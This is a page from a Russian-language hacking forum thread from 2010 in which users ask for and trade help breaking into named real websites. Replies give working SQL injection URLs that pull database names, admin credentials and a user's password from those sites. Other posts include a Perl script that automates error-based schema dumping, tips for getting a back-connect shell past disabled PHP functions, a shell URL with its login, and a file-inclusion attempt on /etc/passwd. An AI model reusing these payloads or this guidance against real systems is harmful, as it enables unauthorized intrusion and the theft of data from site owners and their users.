PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 [61] 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98

Redwood
06.09.2010, 06:10
BrainDeaD said:
ок. попробую.
а что на счёт бенчмарка с переменными? типа

Code:
concat(@i:=0x00,@o:=0x0d0a,benchmark(123,@o:=CONCA T(@o,0x0d0a,(SELECT+concat+(table_schema,0x2E,@i:= table_name)+FROM+information_schema.tables+WHERE+t able_name>@i+order+by table_name+LIMIT+1))),@o)

никак нельзя в блайнд так засунуть, чтоб он всё в ошибке выводил?


Все равно вывести все таблицы за один запрос в ошибке не получиться, так как, метод floor rand - имеет ограничение в 64 символа, а метод основанный на выборке записи по средствам XPath - 31 символ.

rooopster
06.09.2010, 17:53
Привет, как узнать полный путь у www папке на сайте http://www.mgccc.edu/ ? При наличии LOAD_FILE, есть ли какие-то брутфорсные варианты подбора папки? Например, софт, который пробует стандартные структуры папок?

rooopster
06.09.2010, 19:51
Возможно ли залить шелл, если есть инъекция, кавычки НЕ экранируются, известен путь к сайту, но на сайте нету папок, в которые муксул может писать? В конфиге обнаружен логин-пароль юзера дб (удаленно не подключается), вроде как админки нету на сайте. Сайт тот же, что и в предыдущем посте: http://www.mgccc.edu/ На том же серваке лежат http://www.mississippibowl.com, http://www.mississippibowl.org, http://www.msbowl.com, http://www.mgcccbulldogs.com, http://www.saccr.org, и их файлы принадлежат одному юзеру. Если кто-то найдет и ткнет в форму уплоада носом, будет просто отлично

rooopster
06.09.2010, 20:10
Помогите, пожалуйста, найти админку в http://www.followyourheart.com/

kfor
06.09.2010, 21:25
rooopster said:
Помогите, пожалуйста, найти админку в http://www.followyourheart.com/



http://followyourheart.com/news/wp-login.php

Word press

Strilo4ka
06.09.2010, 22:11
BrainDeaD said:
есть запрос

Code:
+and+(select+1+from+(select+count(0),concat((selec t+table_name+from+information_schema.tables+limit+ 206,1),floor(rand(0)*2))+from+information_schema.t ables+group+by+2)a)--+

как видим, в базе более двухсот таблиц. пребирать лимит руками не кошерно.
есть ли возможность вывести весь список таблиц в блайнд-скуле?




Code:
#!/usr/bin/perl -w
# target
use LWP::UserAgent;
$ua = LWP::UserAgent->new;

my $proxy="http://xx.xxx.xxx.xxx:port"; # proxy
$ua->proxy(['http','https'],$proxy);

my $i=0;
while(1)
{
my $req = HTTP::Request->new(GET => "http://[host][path]/?variable=(select+count(*)+from+(select+1+union+se lect+2+union+select+3)x+group+by+concat((SELECT+SC HEMA_NAME+FROM+information_schema.SCHEMATA+limit+$ i,1),floor(rand(0)*2)))--+");
my $res = $ua->request($req);

if ($res->as_string =~ /Duplicate entry(.+)for/)
{
open(FILE,'>>results.txt');
print "print $i: $1\n";
print FILE "$1\n";
close(FILE);
$i++;
}
else {last;}
}

ну под себя не сложно подмутить.

B1t.exe
07.09.2010, 01:58
все таки хотел узнать такие домены как: http://site.com.su/ трудно расковырять? и это выбирается в целях безопасности?

скачал JBroFuzz для фаззинга, но не знаю по каким параметрам сканировать. запутил с SQL инекциями, но ясный пень, что ничего не нашлось ))))))

Redwood
07.09.2010, 03:35
B1t.exe said:
все таки хотел узнать такие домены как:
http://site.com.su/
трудно расковырять? и это выбирается в целях безопасности?
скачал
JBroFuzz
для фаззинга, но не знаю по каким параметрам сканировать. запутил с SQL инекциями, но ясный пень, что ничего не нашлось
))))))


Почитай вот это: /thread228319.html

p0deje
07.09.2010, 08:26
Reflected XSS и magic_quotes_gpc

Есть пассивная XSS вида


Code:
?file=

Судя по всему, magic_quotes_gpc включена, поэтому двойные и одинарные кавычки экранируются. Как можно обойти это, при этом не используя конструкции вида


Code:

durito
07.09.2010, 11:09
Redwood, а можешь залить куда-нибудь MaxPatrol, а то все ссылки битые

Shadrin
07.09.2010, 20:23
есть веб шелл на сервере с


Code:
Disabled PHP Functions: show_source, system, shell_exec, passthru, exec, shell, symlink, popen, proc_open

можно ли запустить бекконект с таким набором?

intNet
07.09.2010, 22:06
Нашёл SQLInj:


Code:
http://strob.od.ua/product.php?pod_kod=60000&id=180+and+1=0+union+select+1,2,concat_ws(0x3a,ver sion(),user(),database()),4,5,6,7,8,9,10,11,12,13, 14,15



Code:
version() 5.0.67-log
user() strob_admin@127.0.0.1
database() strob_product

Как теперь можно залить шелл(не через админку)?

Заранее спасибо, в этой теме 0 почти.

brutos
07.09.2010, 22:58
intNet, вот здесь посмотри:

https://rdot.org/forum/showthread.php?t=352

Strilo4ka
07.09.2010, 23:04
123


brutos said:
intNet
, вот здесь посмотри:
https://rdot.org/forum/showthread.php?t=352


мдя, brutos ну и где там все условия чтоб лить через иньецию?

нет 2-order inj, mg=on, прав нет у юзверя.

мб знаете какие то "особые условия" brutos , ноу-хау, поделитесь?


Shadrin said:
есть веб шелл на сервере с

Code:
Disabled PHP Functions: show_source, system, shell_exec, passthru, exec, shell, symlink, popen, proc_open

можно ли запустить бекконект с таким набором?


perl-скрипт


Shadrin said:
Strilo4ka
как я запущу перл скрипт если у меня фунции запуска в пхп отрублены?


/showthread.php?t=198119


brutos
Strilo4ka, я его сайт не смотрел. Дал ссылку, где он мог бы подробно, на примерах, прочитать про возможность заливки шелла через sql inj, не более.


ок


p0deje said:
Есть пассивная XSS вида

Code:
?file=

Судя по всему, magic_quotes_gpc включена, поэтому двойные и одинарные кавычки экранируются. Как можно обойти это, при этом не используя конструкции вида

Code:




тут (http://forum.xaknet.ru/showthread.php?p=96723)

тут (http://forum.xakep.ru/m_1298634/tm.htm)

пашкеле медаль. )

brutos
07.09.2010, 23:17
Strilo4ka, я его сайт не смотрел. Дал ссылку, где он мог бы подробно, на примерах, прочитать про возможность заливки шелла через sql inj, не более.

Shadrin
08.09.2010, 11:57
Strilo4kaкак я запущу перл скрипт если у меня фунции запуска в пхп отрублены?

DrakonHaSh
08.09.2010, 13:59
как я запущу перл скрипт если у меня фунции запуска в пхп отрублены?


залить perl скрипт (а лучше perl шел), попробовать запустить его через web.

также нужно попробовать создать .htaccess

Options +ExecCGI

AddHandler cgi-script pl

у меня иногда прокатывало, особенно не на серьезных серверах/хостингах.

Byrger
08.09.2010, 19:07
Привет, подскажите как узнать имя базы при слепой MS SQL инъекции (выводится только 1 или 0 при верном или не верном запросе)

И если только брутить то подскажите скрипт или программу для mssql

B1t.exe
08.09.2010, 22:27
Redwood said:
Попробуй MaxPatrol, он фаззит mod_rewrite.
И в довесок почитай вот это: /thread228319.html


очень проблематично найти MaxPatrol.

может посоветуйте альтернативу ?

Acunetix Web Vulnerability Scanner 6 - пойдет?

Просто там каскадное меню и не знаю на сколько правильно "поймет" сканер..

B1t.exe
08.09.2010, 23:50
Redwood said:
http://forum.web-defence.ru/showpost.php?p=2923&postcount=6


Спасибо за прогу.

выбил туда этот сайт. На таблице Request History все время 44:** -200 - 8311 не знаю что это значит.

снял лог, а там только заголовки на всю страницу:


Code:
GET / HTTP/1.1
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host:site.aa.su

Скажу еще, что сайт попасть можно только лишь после авторизации.

molotovkeyt
09.09.2010, 17:39
http://ru.akella.com/Game.aspx?id=1%27

че дальше, кто подскажет?

не имел никогда дело с aspx-движками.

IMMORTAL_S
09.09.2010, 17:46
Всем привет!

Можно ли с помощью залитого на сайт swf создать/переименовать файл? (без обращения его например к php)

Надеюсь мой ход мысли понятен!?

...хотя думается мне, ответ будет отрицательным.

Shadrin
09.09.2010, 17:48
DrakonHaSh у меня браузер предлагает его сохранить( шеллы и на питоне перле пробовал хренова дело,может кто знает как использовать альтернативные функции?

IMMORTAL_S swf же в браузере выполняется нечего не сделаешь,ищи другие пути...

blackhat
09.09.2010, 18:08
Не могу разобраться с шелом, http://morefotok.net/upload/shell.php он читается как обычный текст, логин wall66 пароль 12345

Думал, что-то с .htaccess замутить-не вышло, не дает создать такой файл. Фильтруется имя файла при закачивании файла+ при переименование тоже выдает ошибку. Кто, что может посоветовать?

-PRIVAT-
09.09.2010, 18:09
molotovkeyt said:
http://ru.akella.com/Game.aspx?id=1%27
че дальше, кто подскажет?
не имел никогда дело с aspx-движками.


Тут нет уязвимости.

Shadrin
09.09.2010, 18:11
blackhat said:
Не могу разобраться с шелом, http://morefotok.net/upload/shell.php он читается как обычный текст, логин wall66 пароль 12345
Думал, что-то с .htaccess замутить-не вышло, не дает создать такой файл. Фильтруется имя файла при закачивании файла+ при переименование тоже выдает ошибку. Кто, что может посоветовать?


значит он там уже есть,лить в другую папку или .phtml .php3 это поробуй

blackhat
09.09.2010, 18:14
Shadrin никакого эффекта =(

Axel_Ustus
09.09.2010, 19:19
http://www.xvideo.ru/catalog.php?product=588+order+by+1--

помогите раскрутить инъекцию

на union select никакой реакции

brutos
09.09.2010, 19:44
Axel_Ustus:

http://www.xvideo.ru/catalog.php?group=7+/*!oR+1+gRoUp+bY+cOnCat((SeLEcT+concat_ws(0x3a,vers ion(),user(),database())),rAnD(0)|0)+hAvInG+miN(0) */

kamaz
09.09.2010, 19:55
Axel_Ustus:

Конечно, тебе дали решение задачки, но если тебе вдруг интересно не получение доступа к бд, а причина, по которой не работает union, то ответ таков:

1) При запросе "order by 2" нам возвращается sql запрос:


Code:
select categories_id from t_products_to_categories where product_id = 589 order by 2--

И мы видим, что запрашивается одно поле

2) Закроем запрос


Code:
http://www.xvideo.ru/catalog.php?product=589 -- 1

3) Попробуем написать union select после закрытия:


Code:
http://www.xvideo.ru/catalog.php?product=589 -- 1 union select

Мы видим ошибку, следовательно union select блочится

4)


Code:
http://www.xvideo.ru/catalog.php?product=589 -- 1 union(select

Ошибки нет

5)


Code:
http://www.xvideo.ru/catalog.php?product=589 union(select 1) -- 1

И запрос, который нам вернулся:


Code:
select name,description from t_products_items where products_id = 589 union(select 1) -- 1 order by order_id LIMIT 2

Из этого следует, что тут несколько запросов, и union работать не будет)

Axel_Ustus
09.09.2010, 20:06
спасибо kamaz)

мне была интересна именно причина

Strilo4ka
09.09.2010, 22:39
1


Code:
http://www.xvideo.ru/catalog.php?group=7+/*!oR+1+gRoUp+bY+cOnCat%28%28SeLEcT+concat_ws%280x3 a,id,password,login%29%20from%20a_admins%20limit%2 00,1%29,rAnD%280%29|0%29+hAvInG+miN%280%29%20*/

http://www.xvideo.ru/admin/login.php?action=send

там такое:


064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''asdasd'' and banned = 0' at line 1
select id, password from a_admins where login = 'asdasd'
' and banned = 0


если подмутить типо такого в логин, то должно пустить поидеи:


' or 1=1 limit 0,1[комент|продлить]


зы итак крутить через ошибку можно

gabarea
09.09.2010, 23:46
может кто-нибудь помочь мне с этим?

http://www.menupix.com/hoboken/restaurants.php?id=305209

Я не могу извлечь базу данных

Strilo4ka
09.09.2010, 23:57
gabarea said:
может кто-нибудь помочь мне с этим?
http://www.menupix.com/hoboken/restaurants.php?id=305209
Я не могу извлечь базу данных




Code:
http://www.menupix.com/hoboken/restaurants.php?id=305209%20and%20%20%28/**/select%20count%28*%29%20from%20%28/**/select%201%20union%20/**/select%202/**/union/**/select%203%29x%20group%20by%20concat%28database%28 %29,floor%28rand%280%29*2%29%29%29



Duplicate entry 'mxst1k_mxdb1' for key 1

gabarea
10.09.2010, 00:15
что это значит? Я не могу извлечь данные?

brutos
10.09.2010, 00:22
gabarea:

information_schema.tables фильтруется, поэтому делаем так:


http://www.menupix.com/hoboken/restaurants.php?id=305209+or+1+group+by+concat((SE LECT+count(*)+from+information_schema.columns),ran d(0)|0)+having+min(0)


"Duplicate entry '6471' for key 1" - 647 колонок. Далее прогоняй вот так:


http://www.menupix.com/hoboken/restaurants.php?id=305209+or+1+group+by+concat((SE LECT+concat_ws(0x3a,table_name,column_name)+from+i nformation_schema.columns+limit+0,1),rand(0)|0)+ha ving+min(0)


меняя "limit+0,1" - "limit+647,1". Так сможешь вывести все имена колонок и таблиц, в которых они находятся.

Дальше, надеюсь, сам разберешься.

B1t.exe
11.09.2010, 21:09
кстати, сегодня пытаюсь зайти туда и .. ВУАЛЯ ! сайт лежит. (или ведется тех.работы)

и каким то чудом информация доступна о софте:

в служебном инфе есть линк на __http://drupal.org/node/258

отсюда можно делать вывод, что это Drupal движек.. хотя я думал самописный.

а внизу мелким штифтом:

The mysql error was: Too many connections.

а тут и тип БД.

P.S. DDoS или что.. ?

теперь все это дело надо как небудь совместить..

если там mod_rewrite, то смогу что то ковырять в БД ? или это бесполезно?

Redwood
11.09.2010, 21:55
B1t.exe said:
кстати, сегодня пытаюсь зайти туда и .. ВУАЛЯ ! сайт лежит. (или ведется тех.работы)
и каким то чудом информация доступна о софте:
в служебном инфе есть линк на __http://drupal.org/node/258
отсюда можно делать вывод, что это Drupal движек.. хотя я думал самописный.
а внизу мелким штифтом:
The mysql error was: Too many connections.
а тут и тип БД.
P.S. DDoS или что.. ?
теперь все это дело надо как небудь совместить..
если там
mod_rewrite
, то смогу что то ковырять в БД ? или это бесполезно?


Если тебе известен двиг, скачай исходники и посмотри структуру запросов.

B1t.exe
12.09.2010, 01:07
ну это логично и я понимаю насчет уязвимостей, но там насчет запросов SQL получиться, если ничего не отображаеться на адресном сторке?

mod_rewrite

durito
12.09.2010, 11:45
такая проблема:

http://www.soulmades.com/index.php?method=pubchatform&roomid=1%20union%20select%201,id,password,4,5%20fr om%20soul_souluser%20where+id=1101181/*

вывод идет сюда:


Code:
Private chat between lily_michelle and


1101181 - id

lily_michelle - name

539818 - password

вывод возможен только числовых значений

непонятки с паролем, то ли он выводится неполным, то ли еще что-то. давайте вместе помозгуем.

DrakonHaSh
12.09.2010, 14:07
http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,length(password),4,5 from soul_souluser where+id=1101181/*

=>

длина пароля 16

http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,mid(password,1,6),4,5 from soul_souluser where+id=1101181/*

=>

первые 6 символов '539818'

http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,ascii(mid(password,7,1)),4,5 from soul_souluser where+id=1101181/*

=>

ascii код 7-го символа 99 => 'c'

дальше можно самостоятельно

... добалено позже ...

не, решил дальше поизвращаться

http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,-(-ascii(mid(password,8,1))-100*ascii(mid(password,9,1))-100*100*ascii(mid(password,10,1))),4,5 from soul_souluser where+id=1101181/*

=>

ascii коды 10,9,8 символа = 544955 => '716'

http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,mid(password,8),4,5 from soul_souluser where+id=1101181/*

=>

8-13 символы = '716512'

http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,-(-ascii(mid(password,14,1))-1000*ascii(mid(password,15,1))-1000*1000*ascii(mid(password,16,1))),4,5 from soul_souluser where+id=1101181/*

=>

ascii коды 16,15,14 символа = 57049102 => 'f19'

password = '539818c716512f19'

проверяем

http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,if(password='539818c716512f19',1,8),4,5 from soul_souluser where+id=1101181/*

=>

1, т.е. пароль верный

кста, вариант с if(password=0x35333938313863373136353132663139,1,8 ) почему-то не прокатил. кто знает почему такое может быть ?

rooopster
12.09.2010, 16:31
Привет, подскажите, пожалуйста, чем побыстрее через инъекцию сдампить базу в 18к записей?

hacker-nubik
13.09.2010, 00:40
rooopster said:
Привет, подскажите, пожалуйста, чем побыстрее через инъекцию сдампить базу в 18к записей?


http://forum.xakepok.net/showthread.php?t=7222

asia555
13.09.2010, 16:05
Существует такой запрос

INSERT table_names SET val1=firstname, val2=lastname

Значение val2 могу привести к любому виду.

Задача - добавить запись в table_admin или сделать вывод из table_users.

Возможно ли как-нибудь выкрутиться?

*сделать insert into outfile - не могу, нет прав

**обнаружить select, который бы принимал val2 пока не удалось

Сорри, если это боян. Буду признателен за любую помощь.

Konqi
13.09.2010, 16:12
asia555 said:
Существует такой запрос
INSERT table_names SET val1=firstname, val2=lastname
Значение val2 могу привести к любому виду.
Задача - добавить запись в table_admin или сделать вывод из table_users.
Возможно ли как-нибудь выкрутиться?
*сделать insert into outfile - не могу, нет прав
**обнаружить select, который бы принимал val2 пока не удалось
Сорри, если это боян. Буду признателен за любую помощь.


я совсем не понял что надо делать, но если ты это хочечь то..

INSERT INTO table_users (val1, val2) values ('blabla','blabla');

выборка

вывод - Select val1,val2 from table_users limit 1;

а INSERT INTO outfile в первые слышу

kamaz
13.09.2010, 18:33
asia555 said:
Существует такой запрос
INSERT table_names SET val1=firstname, val2=lastname
Значение val2 могу привести к любому виду.
Задача - добавить запись в table_admin или сделать вывод из table_users.
Возможно ли как-нибудь выкрутиться?


Тоже не совсем понял, что тебе нужно, но вывод,если я правильно понимаю, можно сделать так:

В поле lastname пишем запрос вида


Code:
',firstname=(select {Что_угодно} from table_users limit 1),lastname='pipiska

Если есть инъекция, то после выполнения запроса вместо имени будет выведено то, что было запрошено)

asia555
13.09.2010, 20:29
Сорри, что криво объяснил.

OC - *nix, БД - MySQL. В БД три таблицы table_admin, table_users, table_names. В таблице table_names три поля - user_id, val1, val2.

user_id - это primary key, автоинкримент.

Я обращаюсь к скрипту, в котором есть такой запрос:

INSERT table_names SET user_id=1 val1=firstname, val2=lastname

с val2 я могу делать все что угодно.

Я хочу либо слить таблицу table_users либо добавить запись в table_admin.

Случай 1. Я могу привести запрос к виду:

INSERT table_names SET user_id=1, val1=firstname, val2=(select {Что_угодно} from table_users limit 1)

После чего весь нужный мне вывод попадает в val2 , но я его не вижу. Т.к. SELECT val2 у меня нигде не встречается.


Konqi said:
а INSERT INTO outfile в первые слышу


Здесь я конечно ерунду написал.

Я имел ввиду, что если бы у меня были права на запись в какой-нибудь файл, то я мог бы попробовать сделать

INSERT table_names SET val1=firstname, val2=(select * from table_users into outfile 'file.txt'). Но так писать в файл я по-видимому не могу =(

Сегодня попробовал на локалхосте:

SELECT username from table_users where user_id=1 INTO outfile 'file.txt' - так работает, файл создается

INSERT table_names SET val1=firstname, val2=(SELECT username FROM table_users WHERE user_id=1 INTO outfile 'file.txt') - так не работает =(

Случай 2. Оставив попытки вывести select * from table_users, я хотел добавить запись в table_admin. Пробовал так:

INSERT table_names SET user_id=1 val1=firstname, val2=(lastname on duplicate key update table_admin SET )

user_id передаю заведомо дублирующийся.

Но насколько я понял, таким запросом с таблицей table_admin ничего не поделаешь. А точнее так - таким запросом не возможно воздействовать ни на какую таблицу кроме table_names. Так ли это?

Что еще можно попробовать сделать в первом и втором случае?

moodoone
13.09.2010, 21:10
Помогите раскрутить ету скулю.


Code:
http://polvent.com/index.php?action=catalog&brand=-2+UnIon+selECt+1,2,3,4,5,version(),7,8,9,10,11,12, 13+from+admin--+

Знаю, что таблица админ. Но к information_schema.tables доступа нет. Или что там такое? Помогите пожалуйста..

brutos
13.09.2010, 21:25
moodoone, вот такого плана инъекция:


http://polvent.com/index.php?action=catalog&brand=-2+UNION+ALL+SELECT+1,2,3,4,5,(SELECT+cast(group_co ncat(table_name)+as+char)+FROM+information_schema. tables),7,8,9,10,11,12,13--


Дальше сам знаешь.

moodoone
13.09.2010, 21:34
Спасибо! А где можна почитать про такого вида инъекции?

brutos
13.09.2010, 21:37
Не знаю) Я просто прогнал ссылку через прогу "Havij", она спокойно все обработала. Перехватил запрос, ну и поигрался с ним. Ничего особенного)

Вообще, там даже вот так все работает:


http://polvent.com/index.php?action=catalog&brand=-2+union+ALL+SELECT+1,2,3,4,5,group_concat(table_na me),7,8,9,10,11,12,13+FROM+information_schema.tabl es--


Фильтры стоят на select и from.

moodoone
13.09.2010, 21:44
Code:
http://www.koruna.ua/index.php?id=2'

А тут можеш мне помочь? Сайт уязвим вобше?

____

Сам вроде разобрался) Спасибо еще раз)

gabarea
14.09.2010, 11:06
http://powell.citymedia.ca/deal_framed.php?deal_id=64202

brutos
14.09.2010, 15:34
gabarea said:
http://powell.citymedia.ca/deal_framed.php?deal_id=64202


http://powell.citymedia.ca/categorydetails.php?cat_id=-186'+union+select+1,@@version_compile_os,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22 ,23,24,25,26,27,28,29,30+--+

Kappa_87
14.09.2010, 20:00
что делать если union и select в связке фильтруются

gabarea
14.09.2010, 20:38
http://www.ftv.com/fashion/page.php?P=2803&gid=807&kid=11473&size=full&pid=53965

Gorev
14.09.2010, 21:05
gabarea said:
http://www.ftv.com/fashion/page.php?P=2803&gid=807&kid=11473&size=full&pid=53965


а не пойти бы вам на все 3 буквы? тут что для вас....конвеер по раскрутке скулей для тебя?

DrakonHaSh
14.09.2010, 21:33
Kappa_87

http://www.xxx.ru/showtopic.php?num=-123 or 1 /*%00*/ group by concat(left((select count(*) from INFORMATION_SCHEMA.TABLES),64),rand(0)|0) having min(0)--+

=>

244

в принципе с /*%00*/ и обыкновенный union select скорее всего прокатит (лень и неинтересно уже дальше копать) - у них там некая хрень, похоже самописная, которая все параметры к сайту при любом обращении фильтрует по regexp на что-то в роде select.+from и union.+select c безразличеем к регистру.

кста, запрос и через post проходит

B1t.exe
14.09.2010, 23:58
Заметил, что есть категория сайтов, у которых нет "подцепки" для неопытных..

ну скажем сайт крутой, серьезный и куда не переходи - все линки кончаются на *.htm , *.aspx или .html. А в особыйслучаях - без расширением, чисто по разделам: /home/, /photo/ и т.п.

В таких случаях как можно быть ? в концах попробывал сатвить ', 1=1 и т.п. дела, а по просто показывает, что нет такого страницы.

просто я обычно тренировался на т.п. запросах, как это: /*.php?id=***

а тут другая ситуация уже..

Gorev
15.09.2010, 00:35
B1t.exe said:
Заметил, что есть категория сайтов, у которых нет "подцепки" для неопытных..
ну скажем сайт крутой, серьезный и куда не переходи - все линки кончаются на
*.htm
,
*.aspx
или
.html
. А в особыйслучаях - без расширением, чисто по разделам: /home/, /photo/ и т.п.
В таких случаях как можно быть ? в концах попробывал сатвить ', 1=1 и т.п. дела, а по просто показывает, что нет такого страницы.
просто я обычно тренировался на т.п. запросах, как это:
/*.php?id=***
а тут другая ситуация уже..


mod_rewrite тебе о чем нибудь говорит?

B1t.exe
15.09.2010, 00:56
Gorev

ну да, недавно было тема об этом mod_rewrite , сказали, что тлько фаззингом можно раскрывать пути вроде.

а как насчет этих:


все линки кончаются на *.htm , *.aspx или .html.


это уж точно не mod_rewrite !

shell_c0de
15.09.2010, 01:58
B1t.exe
Постоянный
Регистрация: 06.11.2006


ты аккаунт купил или реально с 2006 года в очаде ? =\

голый html сайт собрался инъектировать ? 0_о

а вот тебе насчет aspx пример


http://news.uzex.com/gazeta/index.aspx?id=133%20or%20133=(SELECT+TOP+1+COLUMN_ NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_N AME='Login'+AND+COLUMN_NAME+NOT+IN+('Author','Auth orEmail','BirCena','CH','CH_location','CurrentCats ','CurrentName','DateDisplay','DateIzd','DateLogon ','DatePost','DatePosted','EN','EN_location','Emai l','F1','F2','F3','F4','F5','F6','F7','F8','F9','F 10','F11','F12','F13','F14','F15','FileName_','Ful lContent','Headline','Host','IP','ImageName_','IsA ctive','LoginName_','Message','MiniContent','Name' ,'NameLogin','Number_','Password','PathName_','Pos ition','RU','RU_location','RozCena','Sticky','Type ','URL','UZ','UZ_location','UserLevel','adrr'))--

Redwood
15.09.2010, 03:22
B1t.exe said:
это уж точно не mod_rewrite !


Почему ты так уверен, что это точно не Mod_Rewrite?

URL можно преобразовать, как угодно и расширение, там может быть любое.

Вот пример:


HTML:
http://www.realcoding.net/news/v-sql-server-katmai-ne-budet-ozhidaemykh-funktsii-winfs.html

Ты думаешь сайт написан на статическом html, а статьи обновляются вручную без базы данных?

Это ничто иное, как php + mysql.

Самый простой и не "хакерский" способ, смотрим заголовки сниффера:


Code:
Server[Apache/2.0.63 (CentOS)]
X-Powered-By[PHP/5.2.9]

Ну и исходный код статьи:


Code:
http://www.realcoding.net/redir.php?url=http://www.thevista.ru

B1t.exe
15.09.2010, 15:31
Redwood

хмм.. вот как значит.. все же Mod_Rewrite так активно исползуется в многих сайтах ?

а там как можно искать SQL иньекции ? только только фаззинг и сканирование портов ? ((

B1t.exe
15.09.2010, 15:40
shell_c0de

не надо гонять тут на меня. стариков хоть уважать надо.

не зная SQL - не значит, что акк купил.

я тут с времени империализма.

а то, то я написал по поводу html, то точно знаю, что там есть SQL база и наверно PHP тоже.

вот смотри пост redwood и поймешь, что на самом деле сайт то не голый...

Gorev
15.09.2010, 15:51
B1t.exe said:
Redwood
хмм.. вот как значит.. все же
Mod_Rewrite
так активно исползуется в многих сайтах ?
а там как можно искать SQL иньекции ? только только фаззинг и сканирование портов ?
((



www.site.com/news=123(SQL injection).html

примерно так

П.С. Уважение зарабатывается не возрастом ..а делами которые ты сделал

shell_c0de
15.09.2010, 17:03
2B1t.exe ну хз как бэ сорри если что =\

кстати юзай еще прогу от Seravin'a BSQLi_v.1.2 он тоже прочекает все твои ссылки на скули

jecka3000
15.09.2010, 20:29
при переходе в какую-нибудь диру пишет:

You don't have permission to access /admin on this server.

чем спастись от этого?

B1t.exe
15.09.2010, 20:42
Gorev


www.site.com/news=123(SQL injection).html


типа www.site.com/news=123&photo=2+UNION+ALL+SELECT+1,2,3,4,5.....html

типа того?


П.С. Уважение зарабатывается не возрастом ..а делами которые ты сделал


Ну и не надо обсирать.

shell_c0de

читал в топике. тип пишет, что helper лучше вроде. ну написал в теме. ТС если обновит и с виде выложит - сакчаю и буду юзать.

NorB
15.09.2010, 20:45
Народ если я делаю подбор кол-ва колонок по group by а потом делаю запрос с юнионом мне форбиден к скрипту вылетает - это фильтрация юнион и селекта?

Gorev
15.09.2010, 20:57
NorB said:
Народ если я делаю подбор кол-ва колонок по group by а потом делаю запрос с юнионом мне форбиден к скрипту вылетает - это фильтрация юнион и селекта?


попробуй как слепую крути, вариантов много что там фильтруется...

Gorev
15.09.2010, 20:59
jecka3000 said:
при переходе в какую-нибудь диру пишет:
You don't have permission to access /admin on this server.
чем спастись от этого?


скорее всего фильтрация по айпи... так что не судьба..если конечно админ сайта не твой друг...

hacker-nubik
16.09.2010, 14:21
Есть обычная blind sql inj, фильтруется LIMIT? Как можно раскрутить без LIMIT'a?

DrakonHaSh
16.09.2010, 20:17
hacker-nubik

http://raz0r.name/obzory/group_concat/

и особенно, ближе к самому концу, коммент от iHornet

еще сюда: https://rdot.org/forum/showthread.php?t=60 глянь

а как это к слепой прикрутить включай мозг

jecka3000
17.09.2010, 22:08
помогите заинклудить

http://luvaccessories.com/shopping.php?category_name=Romantic_Gifts&page=../../../../etc/pssswd%00

547
19.09.2010, 13:00
как слить базу данных мускул? есть доступ к фтп.

Axel_Ustus
19.09.2010, 13:28
http://www.skunk2.com/news2.php?news_id=43+union+select+1,2--

выдает ошибку хотя количество полей подобрано верно

обьясните почему и как выкрутиться

547
19.09.2010, 13:43
Nightmarе said:
Залить шелл, лучше WSO, и через него сдампить.


я пробовал неполучилось

пишет error can't open file

а теперь в предачу еще пишет

You were denied access because:

Access denied by access control list.

но это изза прокси...

может посоветуете какойнибудь провереный дампер

Gorev
19.09.2010, 14:19
Axel_Ustus said:
http://www.skunk2.com/news2.php?news_id=43+union+select+1,2--
выдает ошибку хотя количество полей подобрано верно
обьясните почему и как выкрутиться


BLIND

547
19.09.2010, 16:39
как узнать список таблиц из определенной бд?

я пробовал чтото вроде этого

http://www.ччч.ru/news.php?id=-45+union+select+1,2,3,4,5,unhex%28hex%28group_conc at%28table_name%29%29%29,7,8,9,10+from+information _schema.schemata+where+schema_name=0x00000000

невыйшло..

Blizzard
19.09.2010, 16:44
547 said:
как узнать список таблиц из определенной бд?
я пробовал чтото вроде этого
http://www.ччч.ru/news.php?id=-45+union+select+1,2,3,4,5,unhex%28hex%28group_conc at%28table_name%29%29%29,7,8,9,10+from+information _schema.schemata+where+schema_name=0x00000000
невыйшло..


from+information_schema.tables+where+table_schema= 0x000

Strilo4ka
19.09.2010, 16:57
547

1) кавычки хексить/чарить не надо;

2) если бока, то тащи с INFORMATION_SCHEMA.COLUMNS->TABLE_NAME

или Mysql->columns_priv-> Table_name если возможно.

SofiaLoar
19.09.2010, 20:20
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция' LIKE CONCAT('%',url,'%')

как раскрутить?

Gorev
19.09.2010, 21:18
Strilo4ka said:

Code:
http://www.skunk2.com/news2.php?news_id=43%20or%20%28select%20count%28*% 29%20from%20%28select%201%20union%20select%202%20u nion%20select%203%29x%20group%20by%20concat%28vers ion%28%29,floor%28rand%280%29*2%29%29%29--

4.1.221


эфект тот же....

roddik
19.09.2010, 21:31
если с

/display.php?selected=322' выдается ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ..., но 323-1, любые комментарии, в т.ч. /**/ выдают ошибку, selected=(select 322) тоже, о чем это может говорить? смущает то, что если бы софтина была написана правильно, ошибки бы не было, но не могу понять, какое фильтрование используется...

kfor
19.09.2010, 21:47
roddik said:
если с
/display.php?selected=322' выдается ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ..., но 323-1, любые комментарии, в т.ч. /**/ выдают ошибку, selected=(select 322) тоже, о чем это может говорить? смущает то, что если бы софтина была написана правильно, ошибки бы не было, но не могу понять, какое фильтрование используется...


Так сложно сказать.. кидай в личку сылку если хочешь.. надо смотреть..

SofiaLoar
19.09.2010, 22:48
Strilo4ka said:
интересно
